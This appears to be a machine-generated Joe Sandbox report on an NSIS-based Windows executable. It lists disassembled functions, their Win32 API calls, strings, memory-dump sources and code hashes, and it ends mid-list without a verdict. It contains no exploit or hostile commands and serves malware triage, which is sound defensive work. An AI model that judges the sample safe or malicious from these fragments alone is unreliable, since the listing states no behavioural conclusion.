                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Times New Roman
                                                          • API String ID: 3808545654-927190056
                                                          • Opcode ID: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                          • Instruction ID: 32ce691c062fdf7882ca7c79f7dc95dd78c7e40f541a0607bb82830de01dd458
                                                          • Opcode Fuzzy Hash: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                          • Instruction Fuzzy Hash: 3C017171905250EFE7005BB4EE49BDD3FA4AB19301F208A7AF142B61E2CBB904458BED
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                          • MulDiv.KERNEL32(0008E45C,00000064,0008ED68), ref: 00403001
                                                          • wsprintfW.USER32 ref: 00403011
                                                          • SetWindowTextW.USER32(?,?), ref: 00403021
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 0040300B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                          • Instruction ID: de78d71e2fb772fb87643f85aa6fa794cb5f2d0f129fd79c7e15704eeb750e6f
                                                          • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                          • Instruction Fuzzy Hash: 85014F71640208BBEF209F60DD49FEE3B79AB04344F008039FA02B51D0DBB996559B59
                                                          APIs
                                                            • Part of subcall function 6FC412BB: GlobalAlloc.KERNEL32(00000040,?,6FC412DB,?,6FC4137F,00000019,6FC411CA,-000000A0), ref: 6FC412C5
                                                          • GlobalFree.KERNEL32(?), ref: 6FC42743
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC42778
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                          • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 7d750d05920ed819e3b465be0873ba9c42fc35b3c4c4940eb006bd6cb0fa13c1
                                                          • Instruction ID: 2ddfbda242d4055eab3c0f9184453ecf63cd0fee66d7574d0c423d7776b2c782
                                                          • Opcode Fuzzy Hash: 7d750d05920ed819e3b465be0873ba9c42fc35b3c4c4940eb006bd6cb0fa13c1
                                                          • Instruction Fuzzy Hash: C631F471504502DFCB169F68D9E6CAA77B6FF87364310462DF640C32A0EB316829CB65
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                          • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                          • Instruction ID: fd7949a1005e62e73a365a75524f2bbb059e9229dbd09bef2f8decdc6a7611be
                                                          • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                          • Instruction Fuzzy Hash: FA31A271D00124BBCF21AFA5CE89D9E7E79AF45324F14423AF421762E1CB798D418FA8
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                          • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: 1a12e9e55e3834bda6249efca24500edbac2e4a14d74188f7462202f9d6d8198
                                                          • Instruction ID: b92bcf6971c029c18e61614e23370c49878c6afabdcdd99fcbfa7a685872f2f6
                                                          • Opcode Fuzzy Hash: 1a12e9e55e3834bda6249efca24500edbac2e4a14d74188f7462202f9d6d8198
                                                          • Instruction Fuzzy Hash: 2B5117B2D04208AA8B039FBDC54469E7BB5FF41368F00925BD484E7650F770BA7987A1
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                          • GetClientRect.USER32(?,?), ref: 00401E0A
                                                          • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                          • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                          • Instruction ID: c57303c31a56d7bc8f2a0c5af16d3cdd50a2ae23bf22298ce01a5789fd7b985b
                                                          • Opcode Fuzzy Hash: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                          • Instruction Fuzzy Hash: B9211972900119AFCB05DF98DE45AEEBBB5EB08354F14003AFA45F62A0D7789D81DB98
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FC422D8,?,00000808), ref: 6FC416D5
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FC422D8,?,00000808), ref: 6FC416DC
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FC422D8,?,00000808), ref: 6FC416F0
                                                          • GetProcAddress.KERNEL32(6FC422D8,00000000), ref: 6FC416F7
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC41700
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                          • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 872ab9992991973ceca1e30ebcbd09f35d741037bd0d636e53a3861006f35735
                                                          • Instruction ID: 064993ab90ce7508736039fea512048af39b8a51b039846a863ea4593685b913
                                                          • Opcode Fuzzy Hash: 872ab9992991973ceca1e30ebcbd09f35d741037bd0d636e53a3861006f35735
                                                          • Instruction Fuzzy Hash: F2F037721065397FDA202AA79C4CC9B7EACEF8B2F5B110315F718D119085624C25D7F1
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
                                                          • Instruction ID: 1a2acd516b32d4a8bba1f086ee74ddb70cdd2400578aaa813c3bd98b8eca9c32
                                                          • Opcode Fuzzy Hash: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
                                                          • Instruction Fuzzy Hash: 1121A071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B88941DB98
                                                          APIs
                                                          • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                          • wsprintfW.USER32 ref: 00404E4D
                                                          • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                          • Instruction ID: f1ad69e943298bab6ea0b6c220370dbc78873d19d133ff1b34b391d97265b774
                                                          • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                          • Instruction Fuzzy Hash: 3011EB336041287BDB10566DAC45E9E329CDF85374F250237FE25F21D5E978C92182E8
                                                          APIs
                                                            • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                            • Part of subcall function 00405EF1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,?,00405F65,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405EFF
                                                            • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F04
                                                            • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F1C
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405FA7
                                                          • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405FB7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp
                                                          • API String ID: 3248276644-633902885
                                                          APIs
                                                          • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,?,00405F65,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405EFF
                                                          • CharNextW.USER32(00000000), ref: 00405F04
                                                          • CharNextW.USER32(00000000), ref: 00405F1C
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp, xrefs: 00405EF2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharNext
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp
                                                          • API String ID: 3213498283-469814226
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040353F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405E4C
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040353F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405E56
                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E68
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E46
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3081826266
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 6FC41171
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 6FC411E3
                                                          • GlobalFree.KERNEL32 ref: 6FC4124A
                                                          • GlobalFree.KERNEL32(?), ref: 6FC4129B
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC412B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                           • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          APIs
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll), ref: 004026BA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp$C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll
                                                          • API String ID: 1659193697-2028166896
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                                          • GetTickCount.KERNEL32 ref: 0040306F
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                          • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 0040559F
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004055F0
                                                            • Part of subcall function 00404542: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B8C,00403AA2,?,?,00000008,0000000A,0000000C), ref: 00403BCE
                                                          • GlobalFree.KERNEL32(0065E8B8), ref: 00403BD5
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403BB4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3081826266
                                                          APIs
                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QNuQ5e175D.exe,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 00405E98
                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QNuQ5e175D.exe,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 00405EA8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-224404859
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FF4
                                                          • CharNextA.USER32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406005
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                          • Instruction ID: b896d6fd3cda69cb85c158c7a33f171d68b8f81fed19edc6c2f6f75b2124ada4
                                                          • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                          • Instruction Fuzzy Hash: 64F0F631104418FFC702DFA5DD00D9EBBA8EF45350B2200B9E841FB250D674DE11AB68
                                                          APIs
                                                          • SetErrorMode.KERNEL32 ref: 00403575
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004035A0
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004035B3
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040364C
                                                          • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403689
                                                          • OleInitialize.OLE32(00000000), ref: 00403690
                                                          • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 004036AF
                                                          • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036C4
                                                          • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036FD
                                                          • GetTempPathW.KERNEL32(00000400,00441800,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403835
                                                          • GetWindowsDirectoryW.KERNEL32(00441800,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                          • lstrcatW.KERNEL32(00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403852
                                                          • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403866
